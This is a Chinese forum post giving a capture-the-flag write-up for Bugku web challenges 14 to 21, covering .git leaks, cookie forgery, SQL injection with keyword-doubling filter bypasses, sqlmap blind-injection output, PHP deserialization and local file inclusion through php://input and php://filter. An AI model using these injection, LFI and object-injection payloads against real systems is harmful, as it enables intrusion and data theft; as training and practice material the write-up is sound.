[Writeup] CTF论剑场 Web14-21 WriteUp

[复制链接]
查看1048 | 回复1 | 2019-4-3 17:14:26 | 显示全部楼层 |阅读模式
作者:3ND

平台地址:https://new.bugku.com/

web14 GitHack

hint:听说备份了不少东西呢

img

根据hint信息可以猜测为 /.git/敏感文件泄露,该目录下包含了所有 git 正常工作所需要的信息。

使用 GitHack工具(项目地址:https://github.com/lijiejie/GitHack)进行探测:

img

web15 vim

hint: vim编辑器

img

尝试提交 id参数为swp,回显:不是这里不是这里不是这里!!!

注意到此时的链接为 /1ndex.php?id=swp&submit=提交查询#,尝试修改1i并提交访问,得到flag{Iswh1teooo000oo0}。

web16 江湖

学会如来神掌应该就能打败他了吧

img

进入江湖:

img

点击刷新属性会刷新各属性的值,动态变化,点击确定进入:

img

  • 属性中提示:每次练功和赚钱都会消耗5秒的时间,请您耐心等待。
  • 每次练功会增加一定的属性提升,耗时5s一次。
  • 商店中提示:必须将血量、内力、力道、定力修炼到满才可以学习如来神掌。
  • 点击赚钱每次会增加100银两的收入。

结合学会如来神掌应该就能打败他了吧,推测思路为学会如来神掌后讨伐魔头,因此我们需要通过提升各属性值为满且从商店购买如来神掌

img

方案:拥有足够的银两即可提升属性值为满且学习如来神掌。

F12查看页面源代码发现有以下 js脚本文件:

img

另外Cookie如下:

img

下载script.js审计,这里使用VSCode进行查看(Windows下Shift + Alt + F进行代码格式化整理):

  1. eval(function (p, a, c, k, e, r) {
  2. e = function (c) { return (c < 62 ? '' : e(parseInt(c / 62))) + ((c = c % 62) > 35 ? String.fromCharCode(c + 29) : c.toString(36)) };
  3. if ('0'.replace(0, e) == 0) {
  4. while (c--) r[e(c)] = k[c];
  5. k = [function (e) { return r[e] || e }];
  6. e = function () {
  7. return '[57-9abd-hj-zAB]'
  8. };
  9. c = 1
  10. };
  11. while (c--) if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]); return p
  12. }('7 s(t){5 m=t+"=";5 8=9.cookie.n(\';\');o(5 i=0;i<8.d;i++){5 c=8.trim();u(c.v(m)==0)p c.substring(m.d,c.d)}p""}7 w(a){5 x=new Base64();5 q=x.decode(a);5 r="";o(i=0;i<q.d;i++){5 b=q.charCodeAt();b=b^i;b=b-((i%10)+2);r+=String.fromCharCode(b)}p r}7 ertqwe(){5 y="user";5 a=s(y);a=decodeURIComponent(a);5 z=w(a);5 8=z.n(\';\');5 e="";o(i=0;i<8.d;i++){u(-1<8.v("A")){e=8[i+1].n(":")[2]}}e=e.B(\'"\',"").B(\'"\',"");9.write(\'<img id="f-1" g="h/1-1.k">\');j(7(){9.l("f-1").g="h/1-2.k"},1000);j(7(){9.l("f-1").g="h/1-3.k"},2000);j(7(){9.l("f-1").g="h/1-4.k"},3000);j(7(){9.l("f-1").g="h/6.png"},4000);j(7(){alert("你使用如来神掌打败了蒙老魔,但不知道是真身还是假身,提交试一下吧!A{"+md5(e)+"}")},5000)}', [], 38, '|||||var||function|ca|document|temp|num||length|key|attack|src|image||setTimeout|jpg|getElementById|name|split|for|return|result|result3|getCookie|cname|if|indexOf|decode_create|base|temp_name|mingwen|flag|replace'.split('|'), 0, {}))

发现代码进行了 packer打包,直接在线解混后淆得到:

  1. function getCookie(cname) {
  2. var name = cname + "=";
  3. var ca = document.cookie.split(';');
  4. for (var i = 0; i < ca.length; i++) {
  5. var c = ca[i].trim();
  6. if (c.indexOf(name) == 0) return c.substring(name.length, c.length)
  7. }
  8. return ""
  9. }
  10. function decode_create(temp) {
  11. var base = new Base64();
  12. var result = base.decode(temp);
  13. var result3 = "";
  14. for (i = 0; i < result.length; i++) {
  15. var num = result[i].charCodeAt();
  16. num = num ^ i;
  17. num = num - ((i % 10) + 2);
  18. result3 += String.fromCharCode(num)
  19. }
  20. return result3
  21. }
  22. function ertqwe() {
  23. var temp_name = "user";
  24. var temp = getCookie(temp_name);
  25. temp = decodeURIComponent(temp);
  26. var mingwen = decode_create(temp);
  27. var ca = mingwen.split(';');
  28. var key = "";
  29. for (i = 0; i < ca.length; i++) {
  30. if (-1 < ca[i].indexOf("flag")) {
  31. key = ca[i + 1].split(":")[2]
  32. }
  33. }
  34. key = key.replace('"', "").replace('"', "");
  35. document.write('<img id="attack-1" src="image/1-1.jpg">');
  36. setTimeout(function() {
  37. document.getElementById("attack-1").src = "image/1-2.jpg"
  38. }, 1000);
  39. setTimeout(function() {
  40. document.getElementById("attack-1").src = "image/1-3.jpg"
  41. }, 2000);
  42. setTimeout(function() {
  43. document.getElementById("attack-1").src = "image/1-4.jpg"
  44. }, 3000);
  45. setTimeout(function() {
  46. document.getElementById("attack-1").src = "image/6.png"
  47. }, 4000);
  48. setTimeout(function() {
  49. alert("你使用如来神掌打败了蒙老魔,但不知道是真身还是假身,提交试一下吧!flag{" + md5(key) + "}")
  50. }, 5000)
  51. }

控制台执行如下命令:

img

尝试修改各属性值money为1000000并加密,PHP脚本如下(这里感谢淚笑师傅的指导~自写的python脚本存在一些问题结果不一致~):

  1. <?php
  2. function encode($payload) {
  3. $result = '';
  4. for($i = 0; $i < strlen($payload); $i++) {
  5. $b = ord($payload[$i]);
  6. $b = $b + (($i % 10) + 2);
  7. $b = $b ^ $i;
  8. $result = $result.chr($b);
  9. }
  10. return $result;
  11. }
  12. $payload = 'O:5:"human":10:{s:8:"xueliang";i:12;s:5:"neili";i:856;s:5:"lidao";i:83;s:6:"dingli";i:92;s:7:"waigong";i:0;s:7:"neigong";i:0;s:7:"jingyan";i:0;s:6:"yelian";i:0;s:5:"money";i:1000000;s:4:"flag";s:1:"1";}';
  13. echo base64_encode(encode($payload));
  14. //UTw7PCxqe3FjcC42OThOjWtSUFYwbm99amlzbG0wI3MeFxphX2YZYgxYQ0VeXQRrQ3QICw51T3YFehZMV1pbS2gDMwAGe3sxdnIKYiA/Nj0+PXQTOxQXbB0nZmFieiM3EREbGg1AWQkoXikXKC9SSgIbHR0DAgdaRRVETj0HPD/ErO7v9un57/6iz/+wvrH30KzQuBfl+Pv96rLZ7d6k2dWcm5yM0dHQxy2OlcGSmZiIiIiIhovBiIL4kNTK0dea/7mC+4bu/er1SQ==
  15. //encodeURIComponent->UTw7PCxqe3FjcC42OThOjWtSUFYwbm99amlzbG0wI3MeFxphX2YZYgxYQ0VeXQRrQ3QICw51T3YFehZMV1pbS2gDMwAGe3sxdnIKYiA%2FNj0%2BPXQTOxQXbB0nZmFieiM3EREbGg1AWQkoXikXKC9SSgIbHR0DAgdaRRVETj0HPD%2FErO7v9un57%2F6iz%2F%2BwvrH30KzQuBfl%2BPv96rLZ7d6k2dWcm5yM0dHQxy2OlcGSmZiIiIiIhovBiIL4kNTK0dea%2F7mC%2B4bu%2Fer1SQ%3D%3D
  16. ?>

将修改后的cookie字段发包:

img

提升属性和学习如来神掌后讨伐老魔获取flag:

img

另外在 /wulin.php下发现了出题人留下的彩蛋,可以检测flag的正确性:

img

web17 流量分析

直接使用Wireshark打开bugku.pcapng进行TCP流追踪即可找到flag。

img

web18 Sql injection

img

img

试探过程如下:

  1. ?id=1' 回显空白 -> 可能为单引号闭合
  2. ?id=1'--+ 回显正常 -> 单引号闭合方式
  3. ?id=1' and 1=1--+ 回显空白 -> 可能过滤了and
  4. ?id=1' And 1=1--+ 回显空白 -> 可能过滤了大小写
  5. ?id=1' anandd 1=1--+ 回显正常 -> 嵌套剥离绕过 过滤了and、or
  6. ?id=1' oorrder by 3--+ ->列数为3

爆数据库:

  1. ?id=-1' uniunionon selselectect 1,group_concat(schema_name),3 from infoorrmation_schema.schemata--+

得到:information_schema,web18.

爆表:

  1. ?id=-1' uniunionon selselectect 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='web18'--+

得到: ctf,flag.

爆列:

  1. ?id=-1' uniunionon selselectect 1,group_concat(column_name),3 from infoorrmation_schema.columns where table_name='flag'--+

得到:id,flag.

爆字段:

  1. ?id=-1' uniunionon selselectect 1,flag,3 from flag--+

获取flag{22b7a7c3d73d88050722b3eeb102ee45} .

web19 Poc And Exp's Love Note

img

dirsearch探测下发现存在 /.git/泄露:

img

Githack操作一下,在flag.txt中获取Hint 1: flag is in /eXpl0ve5p0cVeRymuCh。

img

sqlmap跑一下,发现存在基于时间的布尔盲注:

  1. ---
  2. Parameter: username (POST)
  3. Type: AND/OR time-based blind
  4. Title: MySQL >= 5.0.12 AND time-based blind
  5. Payload: username=admin' AND SLEEP(5) AND 'JKEb'='JKEb&password=123
  6. Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
  7. ---

继续获取信息:

  1. available databases [2]:
  2. information_schema
  3. web19
  4. In Database: web19
  5. [2 tables]
  6. +--------+
  7. | user |
  8. | hlnt_2 |
  9. +--------+
  10. Database: web19
  11. Table: user
  12. [1 entry]
  13. +----+----------+----------------+
  14. | id | username | password |
  15. +----+----------+----------------+
  16. | 1 | admin | p0CLOvesExpT00 |
  17. +----+----------+----------------+
  18. Database: web19
  19. Table: hlnt_2
  20. [1 entry]
  21. +----+-----------------------------------------------+
  22. | id | hInt |
  23. +----+-----------------------------------------------+
  24. | 1 | a class for you "https://postimg.cc/6274vCP5" |
  25. +----+-----------------------------------------------+

用获取到的username和password登录admin账户:

img

查看页面源代码发现有注释掉的内容:

img

结合游记内容推测可能为snow HTML隐写(可以在ASCII文本的末行隐藏数据,并且可以通过插入制表位和空格使嵌入的数据在浏览器中不可见),使用BurpSuite抓取该页面内容保存至1.html(尝试从Firefox保存分析存在问题,感谢冷暗雨师傅指导~).

img

  1. C:\Users\light\Desktop>SNOW.EXE -C -p ILOveExp 1.html
  2. flag in /PPPPOOO0CCCC.php

结合在hlnt_2表中获取的Hint2: aclassforyou"https://postimg.cc/6274vCP5"

img

Payload:

  1. <?php
  2. class ReadFile {
  3. public $file;
  4. }
  5. $payload = new ReadFile();
  6. $payload->file = '../../PPPPOOO0CCCC.php';
  7. echo serialize($payload);
  8. //O:8:"ReadFile":1:{s:4:"file";s:22:"../../PPPPOOO0CCCC.php";}
  9. //encodeURIComponent
  10. //O%3A8%3A%22ReadFile%22%3A1%3A%7Bs%3A4%3A%22file%22%3Bs%3A22%3A%22..%2F..%2FPPPPOOO0CCCC.php%22%3B%7D

img

web20 GET_key

你的动态密文是:fb49037b2bb5315bdad5228d7cf0c34e2 GET提交对应的密文可以得到flag(forminputname='key') 输出格式:'flag{....}'

Python脚本:

  1. import re
  2. import requests
  3. url = 'http://123.206.31.85:10020/'
  4. r = requests.session()
  5. text = r.get(url).text
  6. key = re.findall(r'[0-9a-z]+', text)[0]
  7. url2 = url + '?key=' + key
  8. text2 = r.get(url2).text
  9. print(text2)

多试几次,正确提交后有一定几率会获取flag{Md5tiMe8888882019}~

web21 LFI

打开网页显示:

you are not admin !

F12查看发现注释掉的PHP代码:

  1. $user = $_GET["user"];
  2. $file = $_GET["file"];
  3. $pass = $_GET["pass"];
  4. if(isset($user)&&(file_get_contents($user,'r')==="admin")){
  5. echo "hello admin!<br>";
  6. include($file); //class.php
  7. }else{
  8. echo "you are not admin ! ";
  9. }

看到 file_get_contents()函数推测可能存在文件包含(参看LFI(Local File Include)漏洞学习),利用姿势如下:

  • 利用 php://input和POST发包 admin绕过filegetcontents($user,'r')==="admin")。
  • 利用 php://filter/read=convert.base64-encode/resource=class.php来读取class.php。
  1. /index.php?user=php://input&file=php://filter/read=convert.base64-encode/resource=class.php

得到回显:

  1. hello admin!
  2. PD9waHANCmVycm9yX3JlcG9ydGluZyhFX0FMTCAmIH5FX05PVElDRSk7DQogDQpjbGFzcyBSZWFkey8vZjFhOS5waHANCiAgICBwdWJsaWMgJGZpbGU7DQogICAgcHVibGljIGZ1bmN0aW9uIF9fdG9TdHJpbmcoKXsNCiAgICAgICAgaWYoaXNzZXQoJHRoaXMtPmZpbGUpKXsNCiAgICAgICAgICAgIGVjaG8gZmlsZV9nZXRfY29udGVudHMoJHRoaXMtPmZpbGUpOyAgICANCiAgICAgICAgfQ0KICAgICAgICByZXR1cm4gIl9fdG9TdHJpbmcgd2FzIGNhbGxlZCEiOw0KICAgIH0NCn0NCj8+

解Base64得到class.php:

  1. <?php
  2. error_reporting(E_ALL & ~E_NOTICE);
  3. class Read{//f1a9.php
  4. public $file;
  5. public function __toString(){
  6. if(isset($this->file)){
  7. echo file_get_contents($this->file);
  8. }
  9. return "__toString was called!";
  10. }
  11. }
  12. ?>

注意到 __toString()函数执行时会读取并打印 $this->file的内容,构造序列化脚本:

  1. <?php
  2. class Read{
  3. public $file;
  4. }
  5. $payload = new Read();
  6. $payload->file = 'f1a9.php';
  7. echo serialize($payload);
  8. //O:4:"Read":1:{s:4:"file";s:8:"f1a9.php";}

赋值给 pass,当作为字符串是将调用__toString()读取f1a9.php的内容,Payload:

  1. /index.php?user=php://input&file=class.php&pass=O:4:"Read":1:{s:4:"file";s:8:"f1a9.php";}

img

有人的地方就有江湖。
回复

使用道具 举报

hoffconna | 2019-9-3 14:35:00 | 显示全部楼层
管理员。。这图片为啥失效了啊。。。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

87

主题

187

帖子

2733

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
2733